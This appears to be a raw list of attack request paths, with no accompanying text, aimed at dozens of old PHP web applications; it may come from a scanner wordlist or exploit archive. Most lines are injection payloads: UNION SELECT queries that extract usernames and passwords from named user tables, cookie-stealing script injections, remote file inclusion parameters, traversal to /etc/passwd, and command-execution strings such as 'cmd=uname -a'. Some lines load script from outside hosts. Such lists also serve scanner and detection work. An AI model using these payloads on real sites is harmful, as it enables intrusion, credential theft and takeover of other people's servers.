/vegadns/index.php?VDNS_Sessid=ip2eugr7ndn9n9sbnagb9f3p43&state=logged_in&mode=users&user_mode=edit_account&cid=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9%
/vegadns/index.php?VDNS_Sessid=ip2eugr7ndn9n9sbnagb9f3p43&state=logged_in&mode=users&user_mode=edit_account&cid=1%20 AND 1=0
/login.php?caller=xlink&url=detail.php&itemID=1[SQL]
/index.php?x=0&itemgr=1[SQL]
/index.php?caller=xlink&url=brand.php&brandID=1[SQL]
/index.php?x=0&caller=xlink&url=gallery.php&album=1[SQL]
/memo.php?itemID=1[SQL]
/poll/view.php?int_path=http
/ordinaopenpodcast/script/poll/view.php?int_path=http
/[path]/view/Classic.view/thumbnail.php?name=webalbum&page=<script>alert(document.cookie);</script>
/[path]/view/Orange.view/slideshow.php?name=<script></script><script>alert(document.cookie);</script>
/[path]/view/Classic.view/detail.php?name=JetPhoto_Album&page=<script>alert(document.cookie);</script>
/[clevercopy_path]/admin/connect.inc
/claroline/phpbb/viewtopic.php?cidReq=102&gidReq=&forum=1&0&forumview=threaded&topic=1[blind_sql_inject]
/allgemein_transfer.php?monat=4&jahr=[XSS]
/phpkit/include.php?path=content/news.php&contentid=-24'%20union%20select%201,2,3,user_status,5,user_nick,user_pw,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20phpkit_user%20/*
/indexu/invoice.php?base_path=http
/indexu/index.php?theme_path=http
/indexu/become_editor.php?theme_path=http
/indexu/add.php?theme_path=http
/indexu/bad_link.php?theme_path=http
/indexu/browse.php?theme_path=http
/indexu/detail.php?theme_path=http
/indexu/fav.php?theme_path=http
/indexu/get_rated.php?theme_path=http
/indexu/login.php?theme_path=http
/indexu/mailing_list.php?theme_path=http
/indexu/new.php?theme_path=http
/indexu/modify.php?theme_path=http
/indexu/pick.php?theme_path=http
/indexu/power_search.php?theme_path=http
/indexu/rating.php?theme_path=http
/indexu/rating.php?theme_path=http
/indexu/register.php?theme_path=http
/indexu/review.php?theme_path=http
/indexu/rss.php?theme_path=http
/indexu/search.php?theme_path=http
/indexu/send_pwd.php?theme_path=http
/indexu/sendmail.php?theme_path=http
/indexu/tell_friend.php?theme_path=http
/indexu/top_rated.php?theme_path=http
/indexu/user_detail.php?theme_path=http
/indexu/user_search.php?theme_path=http
/index.php?faction=register&newuser_name=[XSS]
/index.php?faction=register&newuser_email=[XSS]
/index.php?faction=register&newuser_hp=[XSS]
/user/index.php?SID=[SQL]
/user/index.php?SID=[SQL]
//phpmyadmin/sql.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&db=fu&table=fu&goto=tbl_properties_structure.php&back=tbl_properties_structure.php&sql
/mybb/member.php?action=do_login&username=[usrname]&password=[pass]&url="><script>alert(1);</script>
/"><script>alert(/Soot/)</script>
/print.php?id=<script>alert(1)</script>
/planetsearchplus.php?search_exp=[XSS]
/member.php?pcpage=showmember&memberid=[SQL]
/[lifetype_dir]/index.php?op=Template&blogId=1&show=[XSS_here]
/[papoo_dir]/print.php?reporeid_print=[XSS_here]&forumid=1
/[modx_dir]/index.php?id=[parameter][XSS_here]
/[modx_dir]/index.php?id=[parameter][reverse_derectory]%00
/[farsinews_path]/search.php?selected_search_arch=><script>alert(document.cookie)</script><!--
/[farsinews_path]/search.php?selected_search_arch=%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C%21--
/[PATH]/index.php?twg_album=&#039;><script>alert(document.cookie)</script>
/index.php?page=<script>alert(document.cookie)</script>
/[path]/sources/functions.php?root_path=http
/profile.php?action=view&uname=<script>alert("Xss")</script>
/blur6ex-0.3.462/index.php?shard=/../../../../../[local-file]%00
/jax_guestbook.php?page=[XSS]&language=english
/guestbook.admin.php?action=list&guestbook_id=0&language=german&gmt_ofs=0&page=[XSS]
/[path]/yearcal.php?ycyear=<script>alert(document.cookie)</script>
/discuss/msgReader$1?mode=%22%3E%3Cscript%3Ealert('XSS!')%3C/script%3E
/sendMail?usernum=2500&referer=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
/mybb/global.php?_SERVER[HTTP_CLIENT_IP]=â??sql
/cpg/index.php?file=.//././/././/././/././/././/././/././/././/./etc/passwd%00
/plugins/stats/stats_view.php?date_from=[XSS]
/plugins/stats/stats_view.php?date_to=[XSS]
/plugins/stats/stats_view.php?date=[XSS]
/phpLinks_path/index.php?logic=or&maximum=&term=%22%3Cscript%3Ealert('r0t')%3C/script%3E
/[path]/index.php?page=XSS
/index.php?mod=editnews&action=editnews&id=1145397112&source=[XSS]
/category.php?cname=[SQL]
/user.php?op=menu&tile=mysupport&type=view&id=1[SQL]
/user.php?op=menu&tile=mysupport&type=details&id=(existing id number)[SQL]
/user.php?op=client_invoice&db_table=client_invoice&tile=myinvoices&print=&id=invoice_id|2869[SQL]
/showtopic.php?threadid=1&pagenum=[SQL]
/cms/login.php?action=XSS
/plexum.php?section=webstats&page=hits&startpos=15&maxrec=457&pagesize=[SQL]
/plexum.php?section=webstats&page=hits&startpos=450&maxrec=[SQL]
/plexum.php?section=webstats&page=hits&startpos=[SQL]
/about.php?inc_dir=http
/[path]/include/common.php?include_path=http
/[path]/EasyGallery.php?ordner=XSS
/[PATH]/member.php?action=showprofile&user_id=[ID]
//?ilang=eng&SID=&[XSS]
/compare_form.php?server_id=0&dn=%22%3Cscript%3Ealert(&#039;r0t&#039;)%3C/script%3E
/copy_form.php?server_id=0&dn=%22%3Cscript%3Ealert(&#039;r0t&#039;)%3C/script%3E
/rename_form.php?server_id=0&dn=%22%3Cscript%3Ealert(&#039;r0t&#039;)%3C/script%3E
/search.php?server_id=0&search=true&filter=objectClass%3D%2A&base_dn=cn%3Dtoto%2Cdc%3Dexample%2Cdc%3Dcom&form=advanced&scope=%22%3Cscript%3Ealert(&#039;r0t&#039;)%3C/script%3E
/template_engine.php?server_id=0&dn=%22%3Cscript%3Ealert(&#039;r0t&#039;)%3C/script%3E
/scry/index.php?v=list&i=0&p=../../..
/index.php?ind=',userid='1
/imagelist.php?blogid=1&act=add_entry&login=1&imagedir=[XSS]
/[Path to scry gallery]/index.php?v=list&i=0&p=<script>var%20variable=111111111111111111;alert(variable);</script>
/[Path]/index.php?action=showgal&cat=[Sql]
/[Path]/index.php?action=showpic&cat=1&pic=[Sql]
/[Path]/postcard.php?action=view&id=[Sql]
/[Path]/print.php?cat=[Sql]
/[admin_Path]/index.php">
/index.php?act=task&ck=&#039;
/member.php?action=viewpro&member=[XSS]
/portfolio.php?cat_id=[XSS]
/portfolio_photo_popup.php?id=[XSS]
/localhost/cutenews/index.php?mod=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C!--
/cutenews/index.php?mod=editnews&action=list&source=<script>alert(document.cookie)</script><!--
/[farsinews_path]/index.php?month=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C!--&year=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C!--
/[farsinews_path]/admin.php?mod=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C !--
/member.php?action=viewpro&member=[XSS]
/forums/misc.php?profile=1&id=[SQL]&[XSS]
/forums/misc.php?profile=1&username=[SQL]&[XSS]
/[path]/event/index.php?page=evilcode.txt?&cmd=uname -a
/weblog_posting.php?mode=quote&r=[SQL]&w=1
/[phpbb_path]/admin/addentry.php?phpbb_root_path=http
/top.php?sessionid=[SQL]
/member.php?action=mailform&user_id=366&sessionid=[SQL]
/planetgallery/admin/gallery_admin.php
/dmcounter/kopf.php?rootdir=http
/includes/kb_constants.php?module_root_path=http
/pocategories.php?stranica=categories&categori=[SQL]
/pocategories.php?stranica=[SQL]
/signup.php?referral=[XSS]
/members.php?login=r0t&p=pwd&func=useinvestplan&id=[XSS]
/index.php?action=item&id=15&prevaction=[XSS]
/index.php?action=item&id=15&prevaction=category&previd=[XSS]
/index.php?action=item&id=15&prevaction=category&previd=2&prevstart=[XSS]
/index.php?action=sendtofriend&type=item&itemid=[XSS]
/index.php?action=item&id=[XSS]
/index.php?action=[XSS]
/popup_image?pos=[XSS]
/jsboard/login.php?table=<script>document.location=&#039;http
/photos/zen/i.php?a=%3Cscript%3Ealert(&#039;XSS%20Vulnerable&#039;)%3B%3C/script%3E&i=1%2Ejpg&s=thumb
/photos/index.php?album=%3Cscript%3Ealert(&#039;XSS%20Vulnerable&#039;)%3B%3C/script%3E
/photos/index.php?album=EXISTING_ALBUM_NAME&image=&#039;%3E%3Cscript%3Ealert(&#039;XSS%20Vulnerable&#039;)%3B%3C/script%3E
/topsite/stats.php?id=1<script>alert(document.cookie)</script>
/[path to geoblog]/viewcat.php?cat=%3Cscript%3Ealert(&#039;xss-010704&#039;);%3C/script%3E
/admin/server_day_stats.php?year=2006&month=05&day=2[xss]
/admin/server_day_stats.php?year=2006&month=05[xss]&day=2
/admin/server_day_stats.php?year=2006[xss]&month=05&day=2
/index.php?p=&address_id=&setbackurl=[XSS]
/index.php?path=/etc
/index.ph?path=/tmp
/index.php?path=[XSS]
/[path]/show.php?path=http
/custdemos/cmuuugy61u0m/index.php?action=add&transtype=|SQL]
/custdemos/cmuuugy61u0m/index.php?action=edit&start=0&transtype=1&entry=|SQL|
/path/mynews.inc.php?hash="><script>alert(/DreamlorD/)</script>
/path/mynews.inc.php?hash=cce496a942d7279c14d7da556c14c7b6&mnid=2&page="><script>alert(/DreamlorD/)</script>
/dlisting.php?cid=1[XSS]
/showpic.php?aid=21&uuid=175&pid=172&slide_show=1&slide_show_secs=0&preloadSlideShow=[XSS]
/links.php?new_input=[XSS]&new_url=[XSS]&new_name=[XSS]
/forums/index.php?act=reputation&fid=5&pid=|SQL|
/script%3E&user=&from_date_day=&from_date_month=&from_date_year=&to_date_day  =&to_date_month=&to_date_year=
/script%3E&from_date_day=&from_date_month=&from_date_year=&to_date_day=&to_date_month=&to_date_year=
/cmspath/website.php?template=../system/03_admin/edit/upload&site_pool=/
/cmspath/website.php?template=../system/03_admin/edit/individual&include=/etc/passwd
/cmspath/website.php?template=../system/admin/accounts&action2=searchaccounts&accounts_group=2
/cmspath/website.php?template=../system/admin/accounts&action2=searchaccounts&accounts_group=2&action=editaccount&accounts_lastname=&accounts_email=&accounts_group=2&account_key=<account_key>
/images/index.php?gallery=[gallery name]&image=<iframe%20src="http
/images/index.php?gallery=[gallery name]&image=<script>alert("lol")<script>
/bookmarks/admin.php?edit=1
/ArticleView.php?article_id=[SQL]
/DiscView.php?mid=144&forum_id=[SQL]
/Discussions.php?forum_id=[SQL]
/EventView.php?event_id=[SQL]
/PollResults.php?answer_id=32&AddVote=[SQL]
/PollResults.php?answer_id=[SQL]
/DiscReply.php?forum_id=1&mid=[SQL]
/products/evotopsites/demo/index.php?cat_id=-13&#039;%20union%20select%20password%20from%20evots_user%20%20where%20&#039;1&#039;=&#039;1
/index.php?pfad=/tmp/
/galerie.php?pfad=/home/
/index.php?pfad=[XSS]
/galerie.php?id=[XSS]
/showthread.php?...$comma=[SQL]
/imagegallery/view.asp?CatID=1&Pic=&#039;
/destek/admin/a_login.php?message=<b>security-testing-roott3r</b>
/charts.php?action=vote&rate=1&id=[SQL]
/charts.php?action=vote&rate=1&id=[XSS]
/ozjournals/ozjournals/index.php?show=comments&action=post
/chat.php?action=showmain&PHPSESSID=XSS
/somescript.php?cmd=ls%20-la&xpl=http
/index.php?rep=[xss]
/diapo.php?rep=[xss]
/affich.php?image=[xss]
/index.php?rep=../../../
/[path]/resources/includes/popp.config.loader.inc.php?
/auction/item.php?id=&#039;[SQL]
/auction/email_request.php?user_id=[malicious code]
/[path]/odp.php?browse=[code]
/[path]/odp.php?browse="><script>alert("lol");</script>
/ftplogin/?login=">[XSS]<div style=
/path/search.php/"><script>alert(/Soot/)</script>
/path/search.php?category="><script>alert(/Soot/)</script>
/admin.php/"><script>alert('xss')</script>
/dc.php?dcid=80477172'
/log.php?logfile=info.php&logtime=000060&email=<?%20require($cur);%20echo%20$password%20?> http
/doceboCms/[dc_path]admin/modules/news/news_class.php?GLOBALS[where_framework]=[cmd_url]
/doceboCms/[dc_path]admin/modules/content/content_class.php?GLOBALS[where_framework]=[cmd_url]
/doceboCms/[dc_path]admin/modules/block_media/util.media.php?GLOBALS[where_cms]=[cmd_url]
/[dc_path]/addons/mod_media/body.php?GLOBALS[where_framework]=[cmd_url]
/[dc_path]/lib/lib.php?GLOBALS[where_framework]=[cmd_url]
/[dc_path]/class.module/class.definition.php?GLOBALS[where_lms]=[cmd_url]
/[dc_path]/modules/scorm/scorm_utils.php?GLOBALS[where_lms]=[cmd_url]
/lib/page_models/layout.1A.php?GLOBALS[where_cms]=http
/lib/page_models/layout.1B.php?GLOBALS[where_cms]=http
/lib/page_models/layout.1C.php?GLOBALS[where_cms]=http
/lib/page_models/layout.1D.php?GLOBALS[where_cms]=http
/lib/page_models/layout.2A.php?GLOBALS[where_cms]=http
/lib/page_models/layout.2B.php?GLOBALS[where_cms]=http
/lib/page_models/layout.2C.php?GLOBALS[where_cms]=http
/lib/page_models/layout.2D.php?GLOBALS[where_cms]=http
/lib/page_models/layout.3A.php?GLOBALS[where_cms]=http
/lib/page_models/layout.3B.php?GLOBALS[where_cms]=http
/lib/page_models/layout.3C.php?GLOBALS[where_cms]=http
/lib/page_models/layout.4D.php?GLOBALS[where_cms]=http
/lib/page_models/layout.4A.php?GLOBALS[where_cms]=http
/lib/page_models/layout.4B.php?GLOBALS[where_cms]=http
/lib/page_models/layout.4C.php?GLOBALS[where_cms]=http
/lib/page_models/layout.4D.php?GLOBALS[where_cms]=http
/lib/page_models/layout.Custom.php?GLOBALS[where_cms]=http
/doceboLms/class/class.dashboard_lms.php?GLOBALS[where_framework]=http
/doceboLms/class.module/track.test.php?GLOBALS[where_lms]=http
/doceboLms/class.module/track.scorm.php?GLOBALS[where_lms]=http
/doceboLms/class.module/track.poll.php?GLOBALS[where_lms]=http
/doceboLms/class.module/track.link.php?GLOBALS[where_lms]=http
/doceboLms/class.module/track.item.php?GLOBALS[where_lms]=http
/doceboLms/class.module/class.module?GLOBALS[where_lms]=http
/doceboLms/class.module/track.glossary.php?GLOBALS[where_lms]=http
/doceboLms/class.module/track.faq.php?GLOBALS[where_lms]=http
/doceboLms/class.module/track.glossary.php?GLOBALS[where_lms]=http
/doceboLms/class.module/track.glossary.php?GLOBALS[where_lms]=http
/doceboLms/class.module/track.glossary.php?GLOBALS[where_lms]=http
/DOCEBO205/modules/credits/help.php?lang=http
/lesons/show.php?lessid=1%20union%20select%20null,null,null,ModName,ModPassword,ModPassword,ModPassword%20FROM%20modretor
/scambi/index.php?start=[XSS]
/directory/index.php?catid=catid&start=[XSS]
/path/index.php?page=gb&count=next=[XSS]
/path/index.php?page=gb&count=[XSS]
/path/index.php?page=showtopis&month=mo&year=Year_the_news=[XSS]
/path/index.php?page=showtopis&month=mo&year=[XSS]
/path/index.php?page=showtopis&month=mo=[XSS]
/path/index.php?page=showtopis&month=[XSS]
/cards/toprated.php?page=[XSS]
/cards/newcards.php?page=[XSS]
/coolphp/index.php?op=[XSS]
/index.php?pic=[XSS]
/tiki/tiki-lastchanges.php?days="><scr<script>ipt>[code]</scr</script>ipt>>
/geeklog/getimage.php?mode=show&image=./<IMG%20SRC=JaVaScRiPt
/article-album.php3?id_article=39&debut_image=[XSS]
/rubrique.php3?id_rubrique=29&date=[XSS]
/?perso=[XSS]
/?aide=[XSS]
/?id=[XSS]
/index.php?todo=showsubsite&subsite=[file]%00
/modules/Forums/admin/index.php?phpbb_root_path=[evil_scripts]
/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]
/modules/Forums/admin/admin_board.php?phpbb_root_path=[evil_scripts]
/modules/Forums/admin/admin_disallow.php?phpbb_root_path=[evil_scripts]
/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=[evil_scripts]
/modules/Forums/admin/admin_groups.php?phpbb_root_path=[evil_scripts]
/modules/Forums/admin/admin_ranks.php?phpbb_root_path=[evil_scripts]
/modules/Forums/admin/admin_styles.php?phpbb_root_path=[evil_scripts]
/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=[evil_scripts]
/modules/Forums/admin/admin_words.php?phpbb_root_path=[evil_scripts]
/modules/Forums/admin/admin_avatar.php?phpbb_root_path=[evil_scripts]
/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=[evil_scripts]
/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=[evil_scripts]
/modules/Forums/admin/admin_forums.php?phpbb_root_path=[evil_scripts]
/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=[evil_scripts]
/modules/Forums/admin/admin_smilies.php?phpbb_root_path=[evil_scripts]
/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]
/modules/Forums/admin/admin_users.php?phpbb_root_path=[evil_scripts]
/support/include/open_form.php?include_dir=http
/portal.php?id=54&a=viewfeature&featureid=99999/**/UNION/**/SELECT/**/0,1,2,3,4,username,6,7,8,9,10,11,12,password/**/from/**/user/**/where/**/userid=1/*
/path/bolum.php?id=[SQL]
/content.php?cat=[SQL]
/index.php?l=[XSS]
/forum.php?l=[XSS]
/articles.php?l=[XSS]
/index.php?id=<IMG%20SRC=http
/[squirrelmail dir]/src/redirect.php?plugins[]=../../../../etc/passwd%00
/orid/ovidentia/approb.php?babInstallPath=http
/orid/ovidentia/vacadmb.php?babInstallPath=http
/orid/ovidentia/vacadma.php?babInstallPath=http
/orid/ovidentia/vacadm.php?babInstallPath=http
/orid/ovidentia/statart.php?babInstallPath=http
/orid/ovidentia/search.php?babInstallPath=http
/orid/ovidentia/posts.php?babInstallPath=http
/orid/ovidentia/options.php?babInstallPath=http
/blog/admin.php?mybloggie_root_path=[evil script]
/blog/scode.php?mybloggie_root_path=[evil script]
/propublish/art.php?artid="><script>alert(/Soot/)</script>
/propublish/cat.php?catname="><script>alert(/Soot/)</script>
/manualmaker/index.php?print=1&id=<iframe src=http
/[path_to_phpbb]/template.php?page=[attacker]
/path/index.php?offset=[SQL]
/path/index.php?start=[SQL]
/editpost.php?forumid=1&post=3 UNION SELECT userid,login,password FROM cf_user INTO OUTFILE &#039;/www/web/resultat.txt&#039;%23&parent=1&p=1
/path/include/common.php?script_path=CmdShell
/WebLink/yourid/somephpcode.php.kr
/[Bookmark4Upath]/inc/dbase.php?env[include_prefix]=[evil_scripts]
/[Bookmark4Upath]/inc/config.php?env[include_prefix]=[evil_scripts]
/[Bookmark4Upath]/inc/common.php?env[include_prefix]=[evil_scripts]
/[Bookmark4Upath]/inc/function.php?env[include_prefix]=[evil_scripts]
/search.php?q=[XSS]
/index.php?catid=[SQL]
/[path]/comment.php?dlid=&#039;/**/union/**/select/**/0,0,userpassword,username,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/dl1_user/**/where/**/userid=1/*
/index.php?action=login&message=<IMG SRC=javascript
/mybb/private.php?to=asda&subject=asd%3E&font=-&size=-&color=-&mode=advanced&message=sd&options%5Bsavecopy%5D=yes&options%5Breadreceipt%5D=yes&action=do_send&pmid=&do=D3vil-0x1%22%3E%3Cscript%3Ealert(1);%3C/script%3E&preview=Preview
/index.php?&gazpart=view<IMG%20"""><SCRIPT>alert("XSS")</SCRIPT>">&<IMG%20"""><SCRIPT>alert("XSS")</SCRIPT>">gazimage=198
/[mg_path]/galsecurity.lib.php?listconfigfile[0]=http
/print/month.php?cid=&catid=[SQL]
/print/month.php?cid=[SQL]
/path/modules.php?op=modload&name=News&file=index&catid=[SQL]
/path/modules.php?op=modload&name=News&file=article&sid=[SQL]
/path/modules.php?op=modload&name=News&file=index&catid=[XSS]
/path/modules.php?op=modload&name=News&file=article&sid=[XSS]
/path/modules.php?op=modload&name=Events_Calendar&file=[XSS]
/readmore.php?news_id=readmore.php?news_id=-1%20'UNION%20SELECT%201,user_name,3,user_password,5,6,7,8,9,10,11%20from%20fusion_users/*
/vscal/index.php?page=showlisting&lid=<SCRIPT%20SRC=evilsite.com//xss.js></SCRIPT>
/vscal/myslideshow.php?dir=./listings/317/images/&title=listing+317
/header.php?Default_Theme=../apache/logs/error.log%00 http
/header.php?Titlesitename=</title><script>alert(document.cookie)</script> http
/meta/meta.php?nuke_url="><script>alert(document.cookie)</script> 
/viewforum.php?forum=2"><script src=http
/editpost.php?forum=1&post_id=888"><script src=http
/[ac_path]/spaw/spaw_control.class.php?spaw_root=[cmd_url]/
/index2.php?pg=2&item_id=11&sort=review.id&#039;>">&#039;><SCRIPT%20SRC=http
/report.php?id=970&item_id=251&#039;>">&#039;><SCRIPT%20SRC=http
/?dir=Scene&file=PElGUkFNRSBTUkM9ImphdmFzY3JpcHQ6YWxlcnQoJ1hTUycpOyI+PC9JRlJBTUU+
/[foing_path]/manage_songs.php?foing_root_path=http
/list.php?page=<script>alert("MajorSecurity")</script>
/detail.php?template=../../../../../../etc/passwd%00
/account/acc_verify.php?vk="><SCRIPT%20SRC=http
/[igloo_Path]/html/index.php?config[private]=http
/[igloo_Path]/html/faq.php?config[private]=http
/[igloo_Path]/html/hardware.php?config[private]=http
/car_classifieds/listings/index.php?pag=car_view&car_id=32&offset=0&ord=1&make_id=63&#039;>">&#039;><SCRIPT%20SRC=http
/car_classifieds/listings/index.php?pag=car_list&ord=1&make_id=63&#039;>">&#039;><SCRIPT%20SRC=http
/rsvp3/view-event-details.php?event_id=74&#039;>">&#039;><SCRIPT%20SRC=http
/rsvp3/event-registration.php?select_events=74&#039;>">&#039;><SCRIPT%20SRC=http
/fastmenu/index.php?pag=gift_certificate&sel_menu=5&#039;>">&#039;><SCRIPT%20SRC=http
/home_rental/index.php?pag=list_properties&act=basket-add&id=17&type=room&ofs=0&day=11&month=6&year=2006&night=1&hotel_id=&show=&sel_menu=&#039;>">&#039;><SCRIPT%20SRC=http
/show.php?UserID=$UserID&MAINID=6&sobjectID=[SQl]
/show.php?UserID=$UserID&MAINID=[SQL]
/language.php?Action=[SQL]
/meaning.php?Action=1&ShowByQuranID=1&QuranID=[SQL]
/meaning.php?Action=1&ShowByQuranID=[SQL]
/meaning.php?Action=[SQL]
/subject.php?MainID=[SQL]
/Simpnews/wap_short_news.php?path_simpnews=Command-Shell
/lumet/album/index.php?imgdir=&#039;><script>alert(10)</script>
/lumet/album/popup.php?w=&#039;><script>alert(10)</script>
/lumet/album/popup.php?h=&#039;><script>alert(10)</script>
/lumet/album/popup.php?t=&#039;><script>alert(10)</script>
/wbb2/profile.php?userid=[SQL]
/studienplatztausch.php?sid=[SQL]
/wbb2/thread.php?threadid=[SQL]
/[confixx]/ftplogin/[user]/ftp_index.php?path=<script>alert(&#039;p0w3r%20ruLeZ&#039;)</script>
/path/bbrss.php?phpbb_root_path=Command*Shell
/shop/page.php?osCsid=http
/[ic_path]/install_ispconfig/scripts/lib/server.inc.php?go_info[isp][classes_root]=[cmd_url]/
/[ic_path]/install_ispconfig/ispconfig/lib/app.inc.php?go_info[server][classes_root]=[cmd_url]/
/[ic_path]/install_ispconfig/ispconfig/web/login/login.php?go_info[server][classes_root]=[cmd_url]/
/[ic_path]/install_ispconfig/ispconfig/web/login/trylogin.php?go_info[server][classes_root]=[cmd_url]/
/gettingInvolved.html?s=">">">">">"><SCRIPT%20SRC=http
/forums/register.php?s=\\">">">">">"><SCRIPT%20SRC=http
/forums/member.php?action=editprofile&s=">">">">&#039;>&#039;>&#039;><SCRIPT%20SRC=http
/library/index.html?s=questions">">">">">"><SCRIPT%20SRC=http
/[hpc_path]/administration/tblcontent/login1.php?msg=[xss]
/comment.php?pageid=12 <script src=http
/forum.php?MainID=-1%20union%20select%201,2,3,4,5,usertitle,7,8,9,10,11,12,13%20from%20Member%20where%20Memberid%20=1/*
/forum.php?MainID=-1%20union%20select%201,2,3,4,5,usertitle,7,8,9,10,11,12,13,14%20from%20Member%20where%20Memberid%20=1/*
/forum.php?MainID=-1%20union%20select%201,2,3,4,5,password,7,8,9,10,11,12,13%20from%20Member%20where%20Memberid%20=1/*
/forum.php?MainID=-1%20union%20select%201,2,3,4,5,password,7,8,9,10,11,12,13,14%20from%20Member%20where%20Memberid%20=1/*
/path/tag.class.php?mycfg=(H)
/path/admin.php?lang=http
/path/ecrire.php?lang=http
/path/lire.php?lang=http
/indexu/admin/app_change_email.php?admin_template_path=http
/indexu/admin/app_change_pwd.php?admin_template_path=http
/indexu/admin/app_mod_rewrite.php?admin_template_path=http
/indexu/admin/app_page_caching.php?admin_template_path=http
/indexu/admin/app_setup.php?admin_template_path=http
/indexu/admin/cat_add.php?admin_template_path=http
/indexu/admin/cat_delete.php?admin_template_path=http
/indexu/admin/cat_edit.php?admin_template_path=http
/indexu/admin/cat_path_update.php?admin_template_path=http
/indexu/admin/cat_search.php?admin_template_path=http
/indexu/admin/cat_struc.php?admin_template_path=http
/indexu/admin/cat_view.php?admin_template_path=http
/indexu/admin/cat_view_hidden.php?admin_template_path=http
/indexu/admin/cat_view_hierarchy.php?admin_template_path=http
/indexu/admin/cat_view_registered_only.php?admin_template_path=http
/indexu/admin/checkurl_web.php?admin_template_path=http
/indexu/admin/db_alter.php?admin_template_path=http
/indexu/admin/db_alter_change.php?admin_template_path=http
/indexu/admin/db_backup.php?admin_template_path=http
/indexu/admin/db_export.php?admin_template_path=http
/indexu/admin/db_import.php?admin_template_path=http
/indexu/admin/editor_add.php?admin_template_path=http
/indexu/admin/editor_delete.php?admin_template_path=http
/indexu/admin/editor_validate.php?admin_template_path=http
/indexu/admin/head.php?admin_template_path=http
/indexu/admin/index.php?admin_template_path=http
/indexu/admin/inv_config.php?admin_template_path=http
/indexu/admin/inv_config_payment.php?admin_template_path=http
/indexu/admin/inv_create.php?admin_template_path=http
/indexu/admin/inv_delete.php?admin_template_path=http
/indexu/admin/inv_edit.php?admin_template_path=http
/indexu/admin/inv_markpaid.php?admin_template_path=http
/indexu/admin/inv_markunpaid.php?admin_template_path=http
/indexu/admin/inv_overdue.php?admin_template_path=http
/indexu/admin/inv_paid.php?admin_template_path=http
/indexu/admin/inv_send.php?admin_template_path=http
/indexu/admin/inv_unpaid.php?admin_template_path=http
/indexu/admin/lang_modify.php?admin_template_path=http
/indexu/admin/link_add.php?admin_template_path=http
/indexu/admin/link_bad.php?admin_template_path=http
/indexu/admin/link_bad_delete.php?admin_template_path=http
/indexu/admin/link_checkurl.php?admin_template_path=http
/indexu/admin/link_delete.php?admin_template_path=http
/indexu/admin/link_duplicate.php?admin_template_path=http
/indexu/admin/link_edit.php?admin_template_path=http
/indexu/admin/link_premium_listing.php?admin_template_path=http
/indexu/admin/link_premium_sponsored.php?admin_template_path=http
/indexu/admin/link_search.php?admin_template_path=http
/indexu/admin/link_sponsored_listing.php?admin_template_path=http
/indexu/admin/link_validate.php?admin_template_path=http
/indexu/admin/link_validate_edit.php?admin_template_path=http
/indexu/admin/link_view.php?admin_template_path=http
/indexu/admin/log_search.php?admin_template_path=http
/indexu/admin/mail_modify.php?admin_template_path=http
/indexu/admin/menu.php?admin_template_path=http
/indexu/admin/message_create.php?admin_template_path=http
/indexu/admin/message_delete.php?admin_template_path=http
/indexu/admin/message_edit.php?admin_template_path=http
/indexu/admin/message_send.php?admin_template_path=http
/indexu/admin/message_subscriber.php?admin_template_path=http
/indexu/admin/message_view.php?admin_template_path=http
/indexu/admin/review_validate.php?admin_template_path=http
/indexu/admin/review_validate_edit.php?admin_template_path=http
/indexu/admin/summary.php?admin_template_path=http
/indexu/admin/template_active.php?admin_template_path=http
/indexu/admin/template_add_custom.php?admin_template_path=http
/indexu/admin/template_delete.php?admin_template_path=http
/indexu/admin/template_delete_file.php?admin_template_path=http
/indexu/admin/template_duplicate.php?admin_template_path=http
/indexu/admin/template_export.php?admin_template_path=http
/indexu/admin/template_import.php?admin_template_path=http
/indexu/admin/template_manager.php?admin_template_path=http
/indexu/admin/template_modify.php?admin_template_path=http
/indexu/admin/template_modify_file.php?admin_template_path=http
/indexu/admin/template_rename.php?admin_template_path=http
/indexu/admin/user_add.php?admin_template_path=http
/indexu/admin/user_delete.php?admin_template_path=http
/indexu/admin/user_edit.php?admin_template_path=http
/indexu/admin/user_search.php?admin_template_path=http
/indexu/admin/whos.php?admin_template_path=http
/path/showcatpicks.php?file_path=http
/path/showarticle.php?file_path=http
/path/admin/authors.php?admin_header_file=http
/path/admin/authors.php?admin_footer_file=http
/path/admin/articles.php?admin_footer_file=http
/path/admin/index.php?admin_header_file=http
/path/admin/categories.php?admin_header_file=http
/path/admin/categories.php?admin_footer_file=http
/path/admin/editconfig.php?admin_header_file=http
/path/admin/editconfig.phpadmin_footer_file=http
/[cms_faethon_path]/data/header.php?mainpath=http
/shop/page.php?pageid=http
/staff_photo_enlarged.php?Staff_ID=-1+union+select+1,2,3,4,5,6+from+Staff
/photo_enlarged.php?Photo_ID=-1+union+select+1,2,3,4,5,6,7,8,9,1+from+PHOTO
/newsdetail.php?NID=-1+union+select+1,2,3,4,5+from+News
/newsdetail.php?NID=-1+union+select+News_date,news_id,3,news_date,5+from+News
/path/index.php?act=add
/Path/showcat.php?forumid=1&Page=-1[SQL])
/search.php?q=&r=0&s=Search&in=1&ex=1&ep= %27%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript% 3E&be=1&t=1&adv=1&type=all&on=new&time=any&author=
/qto/index.php?msg=[xss]
/singapore/index.php?gallery=./../../../
/singapore/index.php?template=<script>alert('Moroccan Security Team');</script>
/v3chat/mail/index.php?action=read&mid=62&id=1<IMG%20"""><SCRIPT%20SRC=http
/v3chat/mail/reply.php?&recipientname=Scorpio&mid=62&id=1<IMG%20"""><SCRIPT%20SRC=http
/messenger/online.php?action=update&membername=luny666&site_id=<IMG%20"""><SCRIPT%20SRC=http
